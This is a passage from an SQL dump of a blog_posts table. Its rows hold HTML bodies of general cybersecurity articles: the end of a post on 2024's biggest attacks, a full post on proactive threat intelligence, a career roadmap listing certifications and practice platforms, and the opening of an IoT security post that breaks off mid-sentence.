[&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Patch Vulnerabilities on Time:</strong></b> Regular updates address critical shortcomings.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Adopt Cybersecurity Solutions like WAFs:</strong></b> Protect web applications from malicious actors.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Focus on Employee Education:</strong></b> Awareness of phishing and social manipulation can be a crucial line of defense.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Conduct Security Audits:</strong></b> Regularly assess and improve your cybersecurity posture.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The battle against cybercrime is an ongoing fight. Staying vigilant, employing proactive measures, and investing in cutting-edge <b><strong class=\"font-bold\">cybersecurity solutions</strong></b> are integral to protecting your business and maintaining customer trust.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>', '', NULL, NULL, 1, 'draft', '2025-01-01 23:37:45', '2026-01-12 21:41:44', 'Information Security', 'Biggest Cyber Attacks of 2024: Exploited Vulnerabilities and Lessons Learned', '', NULL),
(83, 'Proactive Cyber Threat Intelligence: Why Prevention Trumps Reaction', 'proactive-cyber-threat-intelligence-why-prevention-trumps-reaction', 'Cyberattacks are becoming increasingly costly for businesses. In just a year, the average cost of a data breach surged to $4.24 million, a figure that continues to rise. Companies can no longer afford to wait for an attack to happen before they act. Instead, they must adopt proactive measures to safeguard their data and reputation.\r\n\r\nCyber Threat Intelligence (CTI) plays a crucial role in this proactive approach. It involves gathering and analyzing data about potential threats to prevent incidents before they occur. The emphasis on proactive CTI strategies is more vital now than ever.\r\n<h2 id=\"understanding-the-cyber-threat-landscape\">Understanding the Cyber Threat Landscape</h2>\r\n<h3 id=\"the-evolving-nature-of-cyber-threats\">The Evolving Nature of Cyber Threats</h3>\r\nCyber threats are getting more sophisticated. Attackers are employing advanced techniques across various vectors:\r\n<ul>\r\n 	<li><strong>Phishing:</strong> This remains one of the most common methods, tricking users into revealing sensitive information.</li>\r\n 	<li><strong>Ransomware:</strong> Such attacks exploded in frequency, paralyzing organizations until they pay a ransom.</li>\r\n 	<li><strong>Malware:</strong> Diverse types of malware target different vulnerabilities in systems to steal data.</li>\r\n</ul>\r\nThe statistics underscore this trend. Reports indicate that 60% of companies faced a phishing attack in 2022, marking a 20% increase from prior years.\r\n<h3 id=\"the-limitations-of-reactive-security\">The Limitations of Reactive Security</h3>\r\nRelying solely on reactive security can lead to dire consequences. Companies that wait for a breach to respond face significant financial and reputational damage.\r\n\r\nA notable example is Equifax, which suffered a massive data breach affecting 147 million people in 2017. The company’s stock plummeted, and they incurred over $4 billion in expenses related to the breach. Equifax reacted only after the incident, a strategy that failed them terribly.\r\n<h3 id=\"the-cost-of-inaction\">The Cost of Inaction</h3>\r\nFinancial losses from data breaches are staggering. The global average cost per record breached is about $161. In contrast, investing in proactive CTI can reduce these costs significantly. Organizations that deploy proactive measures report 40% lower data breach costs compared to those that react after an attack.\r\n<h2 id=\"the-core-components-of-a-proactive-cti-platform\">The Core Components of a Proactive CTI Platform</h2>\r\n<h3 id=\"threat-hunting--detection\">Threat Hunting &amp; Detection</h3>\r\nProactive threat hunting is essential within a CTI platform. Organizations should actively seek out potential threats before they can do damage. For instance, a successful threat hunt led a firm to discover malware that was already in their system, allowing them to neutralize it before any data was lost.\r\n<h3 id=\"vulnerability-management\">Vulnerability Management</h3>\r\nProactive vulnerability management is another critical aspect. Companies must continuously assess their systems for weaknesses. For example, the infamous Heartbleed vulnerability in OpenSSL was exploited by attackers for years before it was patched. Organizations with a robust vulnerability management program could have avoided this issue altogether.\r\n<h3 id=\"security-information-and-event-management-siem-integration\">Security Information and Event Management (SIEM) Integration</h3>\r\nIntegrating SIEM tools enhances threat detection and response capabilities. SIEM collects and analyzes security data in real-time. This integration helps organizations to respond quickly to incidents, thus minimizing damage.\r\n<h2 id=\"leveraging-threat-intelligence-for-proactive-defense\">Leveraging Threat Intelligence for Proactive Defense</h2>\r\n<h3 id=\"utilizing-open-source-intelligence-osint\">Utilizing Open-Source Intelligence (OSINT)</h3>\r\nOpen-source intelligence (OSINT) is invaluable for identifying emerging threats. By analyzing publicly available data, organizations can uncover vulnerabilities before they are exploited. For example, a company using OSINT efficiently identified a new malware strain that targeted their sector, enabling early prevention measures.\r\n<h3 id=\"integrating-threat-feeds\">Integrating Threat Feeds</h3>\r\nThreat intelligence feeds offer vital information from various sources. These feeds provide updates on known threats, helping organizations maintain a complete threat picture. Some reputable feeds include those from the Cyber Threat Alliance and Recorded Future.\r\n<h3 id=\"automation-and-orchestration\">Automation and Orchestration</h3>\r\nAutomation tools improve the efficiency of proactive CTI. By automating repetitive tasks, teams can focus on critical thinking. Tools like SOAR (Security Orchestration, Automation, and Response) streamline incident response processes, making them quicker and more effective.\r\n<h2 id=\"building-a-proactive-cti-strategy-actionable-steps\">Building a Proactive CTI Strategy: Actionable Steps</h2>\r\n<h3 id=\"assess-your-current-security-posture\">Assess Your Current Security Posture</h3>\r\nBegin with a comprehensive security assessment. Address the following steps:\r\n<ol>\r\n 	<li>Identify current security measures.</li>\r\n 	<li>Evaluate existing vulnerabilities.</li>\r\n 	<li>Review recent security incidents.</li>\r\n</ol>\r\n<h3 id=\"implement-a-robust-threat-intelligence-program\">Implement a Robust Threat Intelligence Program</h3>\r\nKey steps in developing an effective CTI program include:\r\n<ul>\r\n 	<li>Define objectives and goals.</li>\r\n 	<li>Select appropriate tools and platforms.</li>\r\n 	<li>Train staff on threat intelligence usage.</li>\r\n</ul>\r\n<h3 id=\"establish-clear-incident-response-procedures\">Establish Clear Incident Response Procedures</h3>\r\nA well-defined incident response plan is crucial. It should integrate seamlessly with your CTI efforts, enabling your team to react swiftly when an attack is detected.\r\n<h2 id=\"measuring-the-effectiveness-of-your-cti-strategy\">Measuring the Effectiveness of Your CTI Strategy</h2>\r\n<h3 id=\"key-performance-indicators-kpis\">Key Performance Indicators (KPIs)</h3>\r\nTo gauge the success of your CTI strategy, focus on relevant KPIs, including:\r\n<ul>\r\n 	<li>Reduced dwell time (the duration an attacker remains undetected).</li>\r\n 	<li>Improved threat detection rates.</li>\r\n</ul>\r\n<h3 id=\"continuous-improvement\">Continuous Improvement</h3>\r\nContinuous monitoring and evaluation are essential. Regularly review your CTI strategies for effectiveness and efficiency.\r\n<h3 id=\"staying-ahead-of-the-curve\">Staying Ahead of the Curve</h3>\r\nOngoing training is vital for adapting to changing threats. Utilize resources like webinars, online courses, and industry conferences to keep your team informed about the latest developments.\r\n\r\nA proactive CTI approach offers numerous benefits, from reduced risk exposure to minimized financial losses. The shift from reaction to prevention in cybersecurity is no longer optional; it is essential. Investing in a robust CTI strategy offers long-term value that protects both data and reputation. Prevent threats, don’t just respond. Your organization’s future depends on it.\r\n<h2 style=\"text-align: center\"><a href=\"https://infoseclabs.io/start/\">Would you like to check the OpenCTI Dashboard? </a></h2>', '', NULL, NULL, 1, 'draft', '2024-12-31 19:53:13', '2026-01-12 21:41:44', 'Information Security', 'Proactive Cyber Threat Intelligence: Why Prevention Trumps Reaction', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(84, 'The Complete Roadmap to Land Your First Cybersecurity Job in 7-10 Months', 'the-complete-roadmap-to-land-your-first-cybersecurity-job-in-7-10-months', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is one of the most in-demand career fields today, offering lucrative opportunities for those with the right skills. If you\'re considering a career in cybersecurity but aren’t sure where to begin, this roadmap will guide you step-by-step through the skills, certifications, and tools you need to land an entry-level role within 7 to 10 months. Whether you\'re new to tech or transitioning from another industry, following these steps will help you build a strong foundation and gain the confidence to enter this exciting field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Build a Solid Foundation in IT</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before jumping into cybersecurity, it\'s crucial to have a basic understanding of core IT concepts. This step ensures you have the groundwork to troubleshoot, install, and manage basic systems—a prerequisite for working in the field.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Topics to Cover:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Installing Operating Systems</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Managing Common PC Issues</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Networking Essentials</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A great starting point is the <b><strong class=\"font-bold\">CompTIA A+ certification</strong></b>, which covers foundational IT skills. If you commit 3-5 hours of study daily, you can complete this step within 1-2 months. Don’t skip this stage if you’re new to tech—being comfortable with these basics is vital for success.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Learn Computer Networking</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding how networks work is essential because cybersecurity heavily involves securing, monitoring, and even exploiting networks. Gaining expertise in computer networking will help you understand how data flows between systems, and how to protect it.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Topics to Focus On:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">OSI and TCP/IP Models</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Common Protocols (HTTP, HTTPS, TCP, etc.)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">IP Addressing and Subnetting</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Routers, Switches, and Firewalls</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For certifications, <b><strong class=\"font-bold\">CompTIA Network+</strong></b> offers an excellent introduction to networking principles, while <b><strong class=\"font-bold\">CCNA (Cisco Certified Network Associate)</strong></b> dives deeper into Cisco-specific concepts and tools. The CCNA is more challenging but carries extra weight on your resume. Allocate 1-2 months to this step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Operating Systems (Windows and Linux)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Operating systems are at the core of cybersecurity. Most systems you\'ll protect (or investigate) will run on Windows or Linux. Start with one, based on your current familiarity, and then build knowledge in the other.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Learning Areas:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">File Permissions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Logs Management</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">User Management</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spend 1-2 months gaining practical experience with both. While <b><strong class=\"font-bold\">CompTIA Linux+</strong></b> can validate your Linux knowledge, it’s not as essential as networking or cybersecurity certifications. Use training platforms and hands-on practice to solidify your understanding.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Learn Basic Coding</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While you don’t need to be an expert programmer to start in cybersecurity, coding skills can enhance your effectiveness in the role. The most valuable programming language to learn is <b><strong class=\"font-bold\">Python</strong></b> due to its simplicity and versatility within cybersecurity tasks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Python basics, including automation scripts</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Bash scripting (for Linux environments)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">PowerShell scripting (for Windows environments)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Python tutorials (like the ones mentioned on the YouTube channel) are a great place to begin—start with beginner-friendly lessons. Spend about a month practicing and applying your coding skills to common security scenarios.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Cybersecurity Fundamentals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By this stage, you’ll have the foundational skills in IT, networking, and coding. Now, it\'s time to shift into cybersecurity-specific concepts. This involves identifying vulnerabilities, protecting data, and defending systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Certifications:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Google Cybersecurity Professional Certificate</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b> is especially well-recognized and often a requirement for entry-level positions. Allocate around 1-2 months to master cybersecurity fundamentals and complete an introduction to defensive (blue team) and offensive (red team) strategies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Defensive Security (Blue Team)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Defensive security focuses on safeguarding systems and responding to threats. Mastering this area will prepare you for roles in monitoring and defending network systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What to Learn:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Threat detection and analysis</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Log management and interpretation</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Network security best practices</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Certifications to Explore:</strong></b></p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cisco CyberOps Associate</strong></b> (well-respected certification in defensive security)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">PNSA by TCM Security</strong></b> (hands-on training for realistic network defense tasks)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">PTL1 by Security Blue Team</strong></b> (focused on real-world defensive tasks)</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Spend 1-2 months mastering these skills and certifications.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 7: Offensive Security (Red Team)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Offensive security involves identifying weaknesses through penetration testing and network scanning. This knowledge allows you to think like an attacker and defend systems more effectively.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Focus Areas:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Network scanning techniques</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Vulnerability exploitation</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Simulated hacking practices via safe testing environments</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Platforms for Practice:</strong></b></p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">TryHackMe</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Hack The Box</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Certifications to Pursue:</strong></b></p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">eJPT (eLearnSecurity Junior Penetration Tester)</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">CompTIA PenTest+</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">PJP by TCM Security</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Dedicate 1-2 months to building practical offensive security skills.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 8: Hands-On Practice with Labs</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Employers value real-world experience, so supplement your learning with hands-on practice. Labs and simulations help you develop the critical skills required in the field. Use online platforms like <b><strong class=\"font-bold\">RangeForce</strong></b>, <b><strong class=\"font-bold\">Immersive Labs</strong></b>, or <b><strong class=\"font-bold\">Hack The Box</strong></b>, and document your projects or challenges to showcase during interviews.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips for Standing Out to Employers</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While certifications are valuable, employers are more interested in practical skills and how you apply them to solve real-world problems. Showcase your expertise by:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Creating and maintaining a GitHub portfolio of your projects</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Participating in CTF (Capture The Flag) challenges to test and demonstrate your skills</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Taking on freelance or internship opportunities to gain hands-on experience</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Long Will It Take?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you can dedicate 3-5 hours of study and practice daily, this roadmap can take around 7-10 months to complete. However, cybersecurity is a dynamic field, and everyone learns at a different pace. Don’t hesitate to take extra time if needed—it’s more important to thoroughly understand each step than to rush through.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The path to becoming a cybersecurity professional may seem daunting, but it’s achievable with the right approach. Follow this roadmap, stay consistent, and put in the effort to learn and practice. Remember, the cybersecurity field rewards curiosity, adaptability, and problem-solving skills.</p>', '', NULL, NULL, 1, 'draft', '2024-12-21 00:07:48', '2026-01-12 21:41:44', 'Information Security', 'The Complete Roadmap to Land Your First Cybersecurity Job in 7-10 Months', '', NULL),
(85, 'How to Secure Your Internet of Things (IoT) Devices', 'how-to-secure-your-internet-of-things-iot-devices', 'Did you know that approximately 98% of IoT device traffic is unencrypted? This shocking statistic shows just how vulnerable these devices can be. Internet of Things (IoT) devices include everything from smart thermostats to security cameras, and their convenience comes with risks. With the rapid growth of these technologies, securing them has never been more important. Cyber threats targeting IoT devices are on the rise, leading to data breaches and unauthorized access, affecting users in serious ways.\r\n<h2 id=\"understanding-iot-vulnerabilities\">Understanding IoT Vulnerabilities</h2>\r\n<h3 id=\"common-iot-security-threats\">Common IoT Security Threats</h3>\r\nIoT devices face a variety of threats. Some common ones include:\r\n<ul>\r\n 	<li><strong>Malware:</strong> Malicious software can hijack devices, enabling attackers to gain control.</li>\r\n 	<li><strong>Phishing:</strong> This tactic tricks users into revealing login details, often compromising devices.</li>\r\n 	<li><strong>Data Breaches:</strong> Sensitive information can be stolen from improperly secured devices.</li>\r\n 	<li><strong>Denial-of-Service Attacks:</strong> Cybercriminals can overwhelm 